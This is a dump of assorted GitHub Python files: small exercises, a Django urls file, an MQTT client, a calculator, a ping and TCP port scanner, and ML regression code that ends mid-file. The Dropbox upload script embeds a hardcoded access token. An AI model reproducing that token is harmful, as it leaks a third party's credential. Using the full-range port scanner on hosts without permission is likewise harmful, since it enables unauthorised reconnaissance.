+{"seq_id":"21816704671","text":"import dropbox\r\n\r\nclass TransferData:\r\n    def __init__(self, access_token):\r\n        self.access_token = access_token\r\n    \r\n    def upload_file(self, file_from, file_to):\r\n        \r\n        dbx = dropbox.Dropbox(self.access_token)\r\n        # Read the file once and reuse the bytes; a second f.read() after a\r\n        # print(f.read()) would return b'' because the file pointer is at EOF.\r\n        with open(file_from, 'rb') as f:\r\n            data = f.read()\r\n        print(data)\r\n\r\n        dbx.files_upload(data, file_to)\r\n\r\ndef main():\r\n    access_token = 'sl.AwiGhdO02RNNjBWV_7XBYnfLPrYQYjk-VWmvgWv_rWplLZfEVTfrFm_5Z5XYpb9mw37j19wJjeXgHUVPVQRi-4tOm43ZyC-lSxw6SbCGjKy3mbzQMwG4No3nY331OCZvEj7c5Ww'\r\n    transferData = TransferData(access_token)\r\n\r\n    file_from = input(\"Enter the file path to transfer: \")\r\n    file_to = input(\"Enter the full path to upload to dropbox: \")\r\n    transferData.upload_file(file_from, file_to)\r\n\r\nmain()","repo_name":"WhiteHatJr-stud/cloudStorageErrorCode","sub_path":"cloudStorage.py","file_name":"cloudStorage.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73463530924","text":"# 임의의 N개 숫자가 입력으로 주어집니다. N개의 수를 오름찾순으로 정렬한 다음 N개의 수중\n# 한 개의 수인 M이 주어지면 이분검색으로 M이 정렬된 상태에서 몇 번째에 있는지 구하는 프로그램을 작성하세요\n\nimport sys\n# sys.stdin = open(\"in1.txt\", \"rt\")\nn, k = map(int, input().split())\n\n\nlist1 = list(map(int, input().split()))\n\n# print(list1)\nlist1.sort()\n# print(list1)\n\n\n\nlt = 0\nrt = n - 1\nwhile lt <= rt:\n    mid = (rt + lt) // 2\n    if list1[mid] == k:\n        print(mid+1)\n        break\n    elif list1[mid] > k:\n        rt = mid - 1\n    else:\n        lt = mid + 1","repo_name":"genizara/python_algorithm","sub_path":"inflearn01/섹션 4/1. 
이분검색/AA.py","file_name":"AA.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39065686757","text":"#Functions can Accept Arguments\n#Put the argument's name between the parentheses.\ndef search4vowels(word):\n    \"\"\"Display any vowels found in an asked-for word.\"\"\"\n    vowels = set('aeiou')\n    #This line isn't needed anymore.\n    #word = input('Provide a word to search for vowels: ')\n#The call to the \"input\" function is gone (as we don't need that line of code anymore).\n\n    found = vowels.intersection(set(word))\n    for vowel in found:\n        print(vowel)\n\nsearch4vowels('amitpratapsingh')\n","repo_name":"AmitAps/python","sub_path":"headfirstpy/ch4/functakearg.py","file_name":"functakearg.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30131080496","text":"from django.urls import path\nfrom .views import index, sith_page, recruit_page, questions_page, siths, make_hand_of_shadow, hand_amount, more_than_one_hand\n\nurlpatterns = [\n    path('', index, name='index'),\n    path('sith', siths, name='sith'),\n    path('recruit', recruit_page, name='recruit'),\n    path('questions/', questions_page, name='questions'),\n    path('sith/', sith_page, name='sith_page'),\n    path('make_hand_of_shadow//', make_hand_of_shadow, name='make_hand_of_shadow'),\n    path('hand_amount', hand_amount, name='hand_amount'),\n    path('more_than_one_hand', more_than_one_hand, name='more_than_one_hand'),\n]\n","repo_name":"rishat11/star_wars","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71801312684","text":"import os\nimport time\nimport uuid\nimport datetime\nimport json\nfrom pprint import pprint\nimport paho.mqtt.client as mqtt\n\ndef msg_rcv(client, userdata, message):\n    # print(\"Received message '\" + str(message.payload) + \"' on topic '\" + message.topic)\n    try:\n        # message.payload is bytes; decode it before parsing as JSON\n        data = json.loads(message.payload.decode())\n        print(data[\"date\"])\n    except:\n        print(\"A message not intended for me, ignoring... 
\"+ str(message.payload))\n\ndef on_log(client, userdata, level, buf):\n print(\"log: \",buf)\n\ndef main_loop():\n # mosquitto_sub -h 82.165.16.151 -t UCC/mark\n client = mqtt.Client(\"bje_client_\"+ str(uuid.UUID.hex))\n client.on_message = msg_rcv\n # client.on_log = on_log\n client.connect(\"test.mosquitto.org\") # , port=1883 , keepalive=60, bind_address=\"\"\n client.loop_start()\n client.subscribe(\"test_for_anna\")\n\n while True:\n time.sleep(1)\n print(\".\")\n\nif __name__ == \"__main__\":\n main_loop()","repo_name":"kittylyst/helloku-world","sub_path":"rcv.py","file_name":"rcv.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"26776819969","text":"import os\n\n# a little helper function for getting all dettected marker ids\n# from the reference image markers\ndef which(x, values):\n indices = []\n for ii in list(values):\n if ii in x:\n indices.append(list(x).index(ii))\n return indices\n\n\ndef get_camera_path(camera_name):\n\n stream = os.popen('v4l2-ctl --list-devices')\n output = stream.read()\n lines = output.split(\"\\n\")\n for i, line in enumerate(lines):\n if camera_name in line:\n return lines[i+1].strip()\n \n return \"\"","repo_name":"vietanhdev/paper_stream","sub_path":"libs/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"73437640364","text":"import tkinter as tk\n\ndef calculate():\n num1 = float(entry_num1.get())\n num2 = float(entry_num2.get())\n operation = operation_var.get()\n \n if operation == \"Add\":\n result.set(num1 + num2)\n elif operation == \"Subtract\":\n result.set(num1 - num2)\n elif operation == \"Multiply\":\n result.set(num1 * num2)\n elif operation == \"Divide\":\n if num2 == 0:\n result.set(\"Cannot divide by zero\")\n else:\n result.set(num1 / num2)\n else:\n result.set(\"Please select a operation\")\n\n# Create the main window\nroot = tk.Tk()\nroot.title(\"Calculator\")\n\n# Create input fields and labels\nentry_num1 = tk.Entry(root)\nentry_num2 = tk.Entry(root)\nresult = tk.StringVar()\noperation_var = tk.StringVar()\noperation_var.set(\"Select Operation\")\n\nlabel_num1 = tk.Label(root, text=\"Enter first number:\")\nlabel_num2 = tk.Label(root, text=\"Enter second number:\")\nlabel_result = tk.Label(root, text=\"Result:\")\nlabel_operation = tk.Label(root, text=\"Select operation:\")\n\n# Create operation options\noperation_options = [\"Add\", \"Subtract\", \"Multiply\", \"Divide\"]\noption_menu = tk.OptionMenu(root, operation_var, *operation_options)\n\n# Create calculate button\ncalculate_button = tk.Button(root, text=\"Calculate\", command=calculate)\n\n# Grid layout\nlabel_num1.grid(row=0, column=0)\nentry_num1.grid(row=0, column=1)\nlabel_num2.grid(row=1, column=0)\nentry_num2.grid(row=1, column=1)\nlabel_operation.grid(row=2, column=0)\noption_menu.grid(row=2, column=1)\ncalculate_button.grid(row=3, column=0, columnspan=2)\nlabel_result.grid(row=4, column=0)\ntk.Label(root, textvariable=result).grid(row=4, column=1)\n\n# Start the GUI event loop\nroot.mainloop()\n","repo_name":"deepa-48/Calculator","sub_path":"simple_calculator.py","file_name":"simple_calculator.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"41366390049","text":"# -*- coding:utf8 -*-\n\nimport os\nimport 
time\nimport json\nimport argparse\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\n\nfrom utils import check_ping, parse_ip, check_port\n\n\nclass HostScanner(object):\n\n    def __init__(self, args):\n        self.m = args.m\n        self.f = args.f\n        self.file_name = args.w\n        self.cost_print = args.v\n        self.concurrent_num = args.n\n        self.ip = [ip for ip in parse_ip(args.ip)] if args.f == 'ping' else args.ip\n\n    def run_ping(self, ip):\n        res = check_ping(ip)\n        return {'ip': ip, 'can_ping': res}\n\n    def run_tcp_port(self, port):\n        res = check_port(self.ip, port)\n        return {'ip': self.ip, 'port': port, 'is_open': res}\n\n    def run(self):\n        begin = int(time.time())\n        # Use the mode stored on the instance instead of the global args,\n        # so run() also works when HostScanner is imported elsewhere\n        Executer = ThreadPoolExecutor if self.m == 'thread' else ProcessPoolExecutor\n        with Executer(self.concurrent_num) as pool:\n            if self.f == 'ping':\n                result = pool.map(self.run_ping, self.ip)\n            else:\n                result = pool.map(self.run_tcp_port, [port for port in range(65535 + 1)])\n        end = int(time.time())\n\n        if self.cost_print:\n            print('cost time:%s' % (end - begin))\n        data = list()\n        for d in result:\n            data.append(d)\n\n        if self.file_name:\n            with open(self.file_name, 'w') as f:\n                f.write(json.dumps(data))\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-m', type=str, choices=['proc', 'thread'], default='proc', help='multithreading or multiprocessing')\n    parser.add_argument('-n', type=int, help='number of processes or threads')\n    parser.add_argument('-f', choices=['tcp', 'ping'], default='ping', help='execution mode')\n    parser.add_argument('-ip', metavar='ip', required=True, help='ip eg. 192.0.0.1 192.0.0.1-192.0.0.100')\n    parser.add_argument('-w', metavar='filename', help='file to save the scan results')\n    parser.add_argument('-v', action='store_true', help='print how long the scanner took to run')\n    args = parser.parse_args()\n    host_scanner = HostScanner(args)\n    host_scanner.run()\n","repo_name":"Masonnn/ApiTest","sub_path":"pythonYing/week03/homework/pmap02/app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16108182961","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 23 12:38:13 2016\n\n@author: apple\n\"\"\"\nimport numpy as np\nimport time\nfrom numba import jit, f8, njit\nimport C_bisect as Cbi\n\ndef root_func(x,aa,kk):\n    return x**4 + kk*x**2 + aa*x - 3\n    \na = np.random.rand(50000)\nkk = np.random.randint(-2,50,size=a.shape).astype(np.float64)\nres = np.empty(a.size)\nres1 = np.empty(a.size)\nres2 = np.empty(a.size)\n\n\n# [0] python bisection\nt1 = time.time()\ndef python_bisect(a, b, aa, kk, tol, mxiter):\n    its = 0\n    fa = root_func(a, aa, kk)\n    fb = root_func(b, aa, kk)\n    if abs(fa) < tol:\n        return a\n    elif abs(fb) < tol:\n        return b\n    c = (a+b)/2.\n    fc = root_func(c, aa, kk)\n    while abs(fc)>tol and its
web_framework.server_side.infastructure.ui_component import UIComponent\n\n\nclass FileTree(UIComponent):\n def __init__(self, action: Callable = None, size=SIZE_MEDIUM, start_folder = 'bot_features', branch = 'development'):\n super().__init__(size=size)\n self.__action = None\n self.set_action(action)\n self.__files = GitlabFileTree.objects(name=start_folder, branch = branch).first()\n self.__files = self.__files.to_json() if self.__files is not None else {}\n\n def set_action(self, action: Callable):\n if action:\n func_id = ids_manager.gen_action_id(lambda json: action(json['url']))\n self.__action = self.method_to_url(func_id)\n\n def render(self):\n return {\n JSON_TYPE: 'FileTree',\n JSON_ID: self.id,\n JSON_ACTION: self.__action,\n JSON_SIZE: self.size,\n JSON_FILES: self.__files\n }\n","repo_name":"roeinath/Magdad","sub_path":"web_framework/server_side/infastructure/components/file_tree.py","file_name":"file_tree.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72614305964","text":"#2244. Minimum Rounds to Complete All Tasks\ndef minimumRounds(self, tasks: list[int]) -> int:\n tasks.sort()\n fin = 0\n for i in range(0,len(tasks)):\n for j in range(i+1,len(tasks)):\n if tasks[j] != tasks[i]:\n break\n n = j-i-1\n print(n,tasks[i],tasks[j])\n if n%3 == 0:\n fin += n/3\n elif n > 2:\n fin += fun(n)\n elif n == 2:\n fin += 1\n elif n < 2 :\n return -1\n return fin\n\n\"\"\" amount = []\n fin = 0\n for i in r:\n amount.append(tasks.count(i))\n print(amount)\n for l in amount:\n if l < 2:\n return -1\n elif l%3 == 0:\n fin += l/3\n elif l > 2:\n fin += fun(l)\n elif l == 2:\n fin += 1\n return int(fin)\n\"\"\"\ndef fun(n):\n numb = int(n/3)\n for i in range(numb,-1,-1):\n if (n-i*3) %2 == 0:\n return i + (n-i*3)/2\n\n\n \n\nprint(minimumRounds(5,[2,2,3,3,2,4,4,4,4,4]))","repo_name":"leonado10000/CP","sub_path":"leetcode/2244. Minimum Rounds to Complete All Tas.py","file_name":"2244. Minimum Rounds to Complete All Tas.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"3268277726","text":"from tensorflow import keras\nfrom tensorflow.keras import backend as K\n\n__all__ = ['WeightedSum']\n\n\nclass WeightedSum(keras.layers.Layer):\n r\"\"\"Sum the layers with trainable weights. 
All the layers should have the same shape and mask.\n\n    h = \\gamma * \\sum_{i=0}^L w_i h_i\n\n    w will be normalized with softmax.\n    \"\"\"\n\n    def __init__(self,\n                 use_scaling=True,\n                 **kwargs):\n        \"\"\"Initialize the layer.\n\n        :param use_scaling: Whether to use the scaling term `gamma`.\n        :param kwargs:\n        \"\"\"\n        self.supports_masking = True\n        self.use_scaling = use_scaling\n        self.gamma, self.w = None, None\n        super(WeightedSum, self).__init__(**kwargs)\n\n    def get_config(self):\n        config = {\n            'use_scaling': self.use_scaling,\n        }\n        base_config = super(WeightedSum, self).get_config()\n        return dict(list(base_config.items()) + list(config.items()))\n\n    def build(self, input_shape):\n        if isinstance(input_shape, list):\n            layer_num = len(input_shape)\n        else:\n            layer_num = 1\n        if self.use_scaling:\n            self.gamma = self.add_weight(shape=(1,),\n                                         initializer='ones',\n                                         name='%s_gamma' % self.name)\n        self.w = self.add_weight(shape=(layer_num,),\n                                 initializer='ones',\n                                 name='%s_w' % self.name)\n        super(WeightedSum, self).build(input_shape)\n\n    def compute_output_shape(self, input_shape):\n        if isinstance(input_shape, list):\n            return input_shape[0]\n        return input_shape\n\n    def compute_mask(self, inputs, mask=None):\n        if isinstance(mask, list):\n            return mask[0]\n        return mask\n\n    def call(self, inputs, mask=None, **kwargs):\n        e = K.exp(self.w - K.max(self.w))\n        w = e / (K.sum(e) + K.epsilon())\n        if not isinstance(inputs, list):\n            inputs = [inputs]\n        summed = w[0] * inputs[0]\n        for i in range(1, len(inputs)):\n            summed += w[i] * inputs[i]\n        if self.use_scaling:\n            summed *= self.gamma\n        return summed\n","repo_name":"CyberZHG/keras-bi-lm","sub_path":"keras_bi_lm/weighted_sum.py","file_name":"weighted_sum.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"72661126123","text":"import os, time, math\nimport random\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom .data_factory import DataFactory\nfrom .log_factory import LogFactory\nfrom .Normalizer import UnitGaussianNormalizer\nfrom .models.nnet_model import MyNNet\nfrom .utils import *\nfrom .bayes_optimization import Bayes_Optimization\nfrom sklearn.metrics import r2_score\nfrom sklearn.linear_model import LassoCV\nfrom bayes_opt import BayesianOptimization\n\nimport matplotlib.pyplot as plt\n\n\nclass CoreComponent:\n    def __init__(self, model='lasso', imputer='knn', outlier='zscore', pca='pca', device='cuda'):\n        self.root_path = os.path.abspath(os.curdir)\n        self.data_path = os.path.join(self.root_path, 'data')\n        print(\"The root path of our project: \", self.root_path)\n        self.imputer = imputer\n        self.outlier = outlier\n        self.pca = pca\n        self.device = device # choose with your preference\n\n        self.model_name = 'lasso' if model is None else model # choose with your preference\n        if self.model_name == 'lasso':\n            self.train_model = LassoCV\n        elif self.model_name == 'nnet':\n            self.train_model = MyNNet(self)\n        elif self.model_name == 'ridge':\n            from sklearn.linear_model import RidgeCV\n            self.train_model = RidgeCV\n        else:\n            self.train_model = None\n\n        self.log_factory = LogFactory(self, log_to_disk=False)\n        self.data_factory = DataFactory(self)\n        self.full_normalizer = UnitGaussianNormalizer(self)\n        self.y_normalizer = UnitGaussianNormalizer(self)\n        self.bayes_optimization = Bayes_Optimization(self)\n\n        self.full_X = None\n        self.full_Y = None\n        self.validation_X = None\n\n        self.k_fold = 10\n        self.train_percent = 0.99\n\n        self.initialized = 
False\n\n    def initialization(self):\n        random.seed(0)\n        self.log_factory.initialization()\n        self.log_factory.InfoLog(sentences=\"Log Factory fully created\")\n\n        self.data_factory.initialization()\n\n        # 1. read data\n        self.full_X = self.data_factory.read_dataset(os.path.join(self.data_path, \"X_train.csv\"))\n        self.full_Y = self.data_factory.read_dataset(os.path.join(self.data_path, \"y_train.csv\"))\n        self.validation_X = self.data_factory.read_dataset(os.path.join(self.data_path, \"X_test.csv\"))\n\n        # 2. process X files together\n        full_X_shape_0 = self.full_X.shape[0]\n        validation_X_shape_0 = self.validation_X.shape[0]\n        full_validation_X = np.concatenate((self.full_X, self.validation_X), axis=0)\n\n        full_validation_X, self.full_Y = self.data_factory.process_dataset(full_validation_X, self.full_Y,\n                                                                           impute_method=self.imputer,\n                                                                           outlier_method=self.outlier)\n        self.full_normalizer.initialization(full_validation_X)\n        full_validation_X = self.full_normalizer.encode(full_validation_X)\n        full_X_shape_0 = len(self.full_Y)\n        full_validation_X, self.full_Y = self.data_factory.feature_selection(full_validation_X, self.full_Y,\n                                                                             method=self.pca, rows_X=full_X_shape_0)\n        self.log_factory.InfoLog(\"After feature selection, the shape of X = {}\".format(full_validation_X.shape))\n        self.full_X = full_validation_X[:full_X_shape_0, :]\n        self.validation_X = full_validation_X[-validation_X_shape_0:, :]\n\n        # self.y_normalizer.initialization(self.full_Y)\n        # self.full_Y = self.y_normalizer.encode(self.full_Y)\n\n        # 3. transfer numpy data to Tensor data\n        self.log_factory.InfoLog(\"Read data completed from X_train.csv, with shape as {}\".format(self.full_X.shape))\n        self.full_X = torch.autograd.Variable(torch.from_numpy(np.array(self.full_X)).float()).to(self.device)\n        # self.full_Y = self.data_factory.process_dataset(self.full_Y) # Y data cannot be processed!\n        self.log_factory.InfoLog(\"Read data completed from y_train.csv, with shape as {}\".format(self.full_Y.shape))\n        self.full_Y = torch.autograd.Variable(\n            torch.from_numpy(np.array(self.full_Y).reshape(self.full_Y.shape[0], 1)).float()).to(self.device)\n\n        self.log_factory.InfoLog(\n            \"Read data completed from X_test.csv, with shape as {}\".format(self.validation_X.shape))\n        self.validation_X = torch.autograd.Variable(torch.from_numpy(np.array(self.validation_X)).float()).to(\n            self.device)\n\n        self.initialized = True\n        \n\n    def run(self):\n        if self.model_name == \"lasso\":\n            full_X = self.full_X.cpu().numpy()\n            full_Y = self.full_Y.cpu().numpy()\n            reg = self.train_model(n_alphas=100, cv=self.k_fold, eps=1e-3, max_iter=5000, random_state=0,\n                                   precompute=False).fit(full_X, full_Y)\n            predicted_y_validate = reg.predict(self.validation_X.cpu().numpy())\n            predicted_y_full = reg.predict(full_X)\n            self.dump_validated_y(predicted_y_validate)\n            self.log_factory.InfoLog(\"all score = {}\".format(r2_score(full_Y, predicted_y_full)))\n        elif self.model_name == 'ridge':\n            full_X = self.full_X.cpu().numpy()\n            full_Y = self.full_Y.cpu().numpy()\n            \"\"\"\n            params: cv=k-fold  // if None, leave-one-out CV is used for validation, but it scores with MSE rather than r2_score\n                    alphas=[...] 
// the list of candidate regularization parameters\n                    fit_intercept=True  // default is True; whether to fit an intercept (which we certainly need)\n            \"\"\"\n            reg = self.train_model(alphas=[1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1, 10.0], cv=self.k_fold).fit(full_X, full_Y)\n            predicted_y_validate = reg.predict(self.validation_X.cpu().numpy())\n            predicted_y_full = reg.predict(full_X)\n            self.dump_validated_y(predicted_y_validate.squeeze(1))\n            self.log_factory.InfoLog(\"all score = {}\".format(r2_score(full_Y, predicted_y_full)))\n        elif self.model_name == \"mlp\":\n            from sklearn.ensemble import ExtraTreesRegressor\n            from sklearn.model_selection import RandomizedSearchCV, GridSearchCV, cross_val_score\n            #from sklearn.neural_network import MLPRegressor\n\n            row_idx = [i for i in range(self.full_X.shape[0])]\n            random.shuffle(row_idx)\n            train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n            val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n            train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n            val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n\n            ### Bayesian hyperparameter tuning\n            # the black-box objective function\n            def black_box_function(n_estimators, min_samples_split, max_features, max_depth, min_samples_leaf):\n                val = cross_val_score(\n                    ExtraTreesRegressor(n_estimators = int(n_estimators),\n                                        max_features = int(max_features),\n                                        max_depth = int(max_depth),\n                                        min_samples_split = int(min_samples_split),\n                                        min_samples_leaf = int(min_samples_leaf),\n                                        random_state = 2,\n                                        bootstrap=True\n                                        ),\n                    train_X, train_Y,scoring='r2', cv=5, n_jobs=-1\n                ).mean()\n                return val #max_features = max_features, # float\n            \n            # the search-space bounds\n            pbounds= {'n_estimators': (500, 2000),\n                      'max_features': (1, self.full_X.shape[1]),\n                      'max_depth': (5, 150),\n                      'min_samples_split': (2, 30),\n                      'min_samples_leaf':(1, 20)}\n            #'bootstrap': [True, False]\n            # instantiate the optimizer\n            optimizer = BayesianOptimization(f= black_box_function,\n                                             pbounds= pbounds,\n                                             verbose= 2, # verbose = 1 prints only when a maximum is observed, verbose = 0 is silent\n                                             random_state= 1,\n                                             )\n            # set the number of iterations\n            optimizer.maximize(init_points= 12, # number of random-search steps\n                               n_iter= 100, # number of Bayesian-optimization steps\n                               )\n            # print the best result\n            print(optimizer.max)\n            n_es=optimizer.max['params']['n_estimators']\n            max_dep=optimizer.max['params']['max_depth']\n            max_fea=optimizer.max['params']['max_features']\n            min_s_l=optimizer.max['params']['min_samples_leaf']\n            min_s_s=optimizer.max['params']['min_samples_split']\n            \n            # extra trees regression\n            extra_tree = ExtraTreesRegressor(n_estimators=int(n_es),max_depth=int(max_dep), max_features=int(max_fea),\n                                             min_samples_leaf=int(min_s_l), min_samples_split=int(min_s_s), n_jobs=-1,bootstrap=True)\n            extra_tree.fit(train_X, train_Y)\n            extra_pred = extra_tree.predict(val_X)\n\n            self.log_factory.InfoLog(\"The score of extra_tree for validation={}\".format(r2_score(val_Y, extra_pred)))\n            \n            # export the predictions as a correctly formatted csv file\n            ID = np.array(range(len(val_X)))\n            import pandas as pd\n            df = pd.DataFrame({'id': ID,\n                               'y': extra_pred})\n            df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n            self.dump_validated_y(extra_tree.predict(self.validation_X.cpu().numpy()))\n            \n        elif self.model_name == \"adaboost\":\n            from sklearn import ensemble \n            from sklearn.tree import DecisionTreeRegressor \n            row_idx = [i for i in range(self.full_X.shape[0])]\n            random.shuffle(row_idx)\n            train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n            val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n            train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n            val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n            \n            print('Bayes_Optimization(adaboost)')\n            
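# Bayes_opt_Adaboost is a project-local helper; it is assumed here to return the tuned hyperparameters in exactly this order.\n            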
n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_Adaboost(train_X = train_X, train_Y = train_Y) \n            Adaboost = ensemble.AdaBoostRegressor(\n                DecisionTreeRegressor( max_features = max_fea, max_depth = max_dep, \n                                       min_samples_split = min_s_s,min_samples_leaf = min_s_l, random_state = 2),\n                n_estimators = n_es,learning_rate = l_ra)\n            \n            Adaboost.fit(train_X, train_Y)\n            ada_pred = Adaboost.predict(val_X)\n\n            self.log_factory.InfoLog(\"The score of Adaboost for validation={}\".format(r2_score(val_Y, ada_pred)))\n            \n            # export the predictions as a correctly formatted csv file\n            ID = np.array(range(len(val_X)))\n            import pandas as pd\n            df = pd.DataFrame({'id': ID,\n                               'y': ada_pred})\n            df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n            self.dump_validated_y(Adaboost.predict(self.validation_X.cpu().numpy()))\n            \n        elif self.model_name == \"Gboost\":\n            from sklearn import ensemble \n            model_GradientBoostingRegressor = ensemble.GradientBoostingRegressor()\n            \n            row_idx = [i for i in range(self.full_X.shape[0])]\n            random.shuffle(row_idx)\n            train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n            val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n            train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n            val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n            \n            #Gboost\n            print('Bayes_Optimization(Gboost)')\n            n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s = self.bayes_optimization.Bayes_opt_GBoost(train_X = train_X, train_Y = train_Y) \n            Gboost = ensemble.GradientBoostingRegressor(max_features = max_fea, max_depth = max_dep, \n                                                        min_samples_split = min_s_s, min_samples_leaf = min_s_l, random_state = 2,\n                                                        n_estimators = n_es, learning_rate = l_ra, loss='huber')\n\n            Gboost.fit(train_X, train_Y)\n            gbt_pred = Gboost.predict(val_X)\n            \n            self.log_factory.InfoLog(\"The score of Gboost for validation={}\".format(r2_score(val_Y, gbt_pred)))\n            \n            # export the predictions as a correctly formatted csv file\n            ID = np.array(range(len(val_X)))\n            import pandas as pd\n            df = pd.DataFrame({'id': ID,\n                               'y': gbt_pred})\n            df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n            self.dump_validated_y(Gboost.predict(self.validation_X.cpu().numpy()))\n            \n        elif self.model_name == \"ensemble\":\n            from sklearn.model_selection import KFold, GridSearchCV\n            \n            row_idx = [i for i in range(self.full_X.shape[0])]\n            random.shuffle(row_idx)\n            train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n            val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n            train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n            val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n            \n            score_function = r2_score\n\n            # =============Add different models here!!!!=============\n            model_heads = []\n            models = []\n            from sklearn import tree # 0\n            model_DecisionTreeRegressor = tree.DecisionTreeRegressor()\n            model_heads.append(\"Decision Tree Regression\\t\\t\")\n            models.append(model_DecisionTreeRegressor)\n            \n            from sklearn import linear_model # 1\n            model_LinearRegression = linear_model.LinearRegression()\n            model_heads.append(\"Linear Regression\\t\\t\\t\\t\")\n            models.append(model_LinearRegression)\n            \n            from sklearn import svm # 2\n            model_SVR = svm.SVR()\n            model_heads.append(\"Support Vector Machine Regression\")\n            models.append(model_SVR)\n            \n            from sklearn import neighbors # 3\n            model_KNeighborsRegressor = neighbors.KNeighborsRegressor()\n            model_heads.append(\"K-Nearest Neighbor Regression\\t\")\n            models.append(model_KNeighborsRegressor)\n            \n            from sklearn import ensemble # 4\n            
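# Each numbered import below pairs a tab-padded display name in model_heads with an untrained regressor in models, so scores print aligned.\n            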
model_RandomForestRegressor = ensemble.RandomForestRegressor(n_estimators=20)\n            model_heads.append(\"Random Forest Regression\\t\\t\")\n            models.append(model_RandomForestRegressor)\n            \n            from sklearn import ensemble # 5\n            model_AdaBoostRegressor = ensemble.AdaBoostRegressor(n_estimators=150)\n            model_heads.append(\"AdaBoost Regression\\t\\t\\t\\t\")\n            models.append(model_AdaBoostRegressor)\n            \n            from sklearn import ensemble # 6\n            model_GradientBoostingRegressor = ensemble.GradientBoostingRegressor()\n            model_heads.append(\"Gradient Boosting Regression\\t\")\n            models.append(model_GradientBoostingRegressor)\n            \n            from sklearn.ensemble import BaggingRegressor # 7\n            model_BaggingRegressor = BaggingRegressor()\n            model_heads.append(\"Bagging Regression\\t\\t\\t\\t\")\n            models.append(model_BaggingRegressor)\n            \n            from sklearn.tree import ExtraTreeRegressor # 8\n            model_ExtraTreeRegressor = ExtraTreeRegressor()\n            model_heads.append(\"ExtraTree Regression\\t\\t\\t\")\n            models.append(model_ExtraTreeRegressor)\n            \n            import xgboost as xgb # 9\n            # params = {'learning_rate': 0.1, 'n_estimators': 400, 'max_depth': 8, 'min_child_weight': 2, 'seed': 0,\n            # 'subsample': 0.8, 'colsample_bytree': 0.8, 'gamma': 0.2, 'reg_alpha': 3, 'reg_lambda': 2}\n            model_XGBoostRegressor = xgb.XGBRegressor()\n            model_heads.append(\"XGBoost Regression\\t\\t\\t\\t\")\n            models.append(model_XGBoostRegressor)\n            # =============Model Adding Ends=============\n            \n            # =============For Ensemble and Stacking =============\n            from sklearn.linear_model import ElasticNet, Lasso, BayesianRidge, LassoLarsIC\n            from sklearn.kernel_ridge import KernelRidge\n            from sklearn.pipeline import make_pipeline\n            from sklearn.preprocessing import RobustScaler\n            from sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone\n            from sklearn.model_selection import KFold\n            import xgboost as xgb\n            import lightgbm as lgb\n            from sklearn import linear_model\n            from sklearn.tree import DecisionTreeRegressor \n            from sklearn.ensemble import ExtraTreesRegressor\n\n\n            \n            # original combination: Enet+KRR+GBoost+lasso(meta)+xgb+lgb\n            # new combination: adaboost+RandomForest+GBoost+lasso(meta)+xgb+lgb\n            '''\n            #lasso\n            print('Bayes_Optimization(lasso)')\n            alp = self.bayes_optimization.Bayes_opt_lasso(train_X = train_X, train_Y = train_Y)\n            lasso = make_pipeline(RobustScaler(), Lasso(alpha = alp, random_state=1))\n            #lasso = make_pipeline(RobustScaler(), Lasso(alpha =0.0005, random_state=1))\n            '''\n            #extra_tree\n            